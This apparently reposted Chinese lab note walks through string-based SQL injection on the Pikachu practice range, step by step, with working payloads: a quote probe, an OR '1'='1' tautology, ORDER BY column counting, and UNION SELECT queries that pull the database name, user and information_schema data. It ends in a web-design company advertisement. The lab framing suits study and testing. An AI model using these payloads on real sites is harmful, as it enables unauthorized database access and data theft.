☰
PIKACHU_SQL(string-based)
2026/10/7 15:13:39 网站建设 项目流程

SQL注入的模型——输入-> GET参数-> PHP -> SQL查询-> mysql -> 页面结果
背后的逻辑代码,通常是 SELECT * FROM users WHERE username = ‘$username’ ;

一正常测试——输入 admin, 应该被放在单引号中;
二测试是否字符型注入——输入单引号’,如果查询结果发生变化,说明原来的SQL结构被破坏;

三布尔条件来判断,是否存在字符型SQL注入——输入永真条件1’ OR ‘1’=‘1’ # 页面返回多个用户如图;
输入永假条件1’ OR ‘1’=‘2’ # 没有返回用户,确认有SQL注入;

四判断列数——输入1’ ORDER BY 2 # 数字从1-3类推,然后输入1’ UNION SELECT 1,2 # 验证列数

五联合查询数据库信息,包括库名、表名、字段等,输入 1’UNION SELECT 1,database() #
1‘ UNION SELECT 1,user() # 回显如图

输入 1’ UNION SELECT 1,COUNT(*) FROM information_schema.tables # 回显如图
六重要字段
information_schema是mysql 5.7版本后用来提供数据可结构信息的系统数据库;
table_schema 是元数据表 information_schema.tables 里面的一个字段;
七聚合函数让结果变成一行,输入1‘ UNION SELECT 1,MIN(table_schema) FROM information_schema.tables #

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询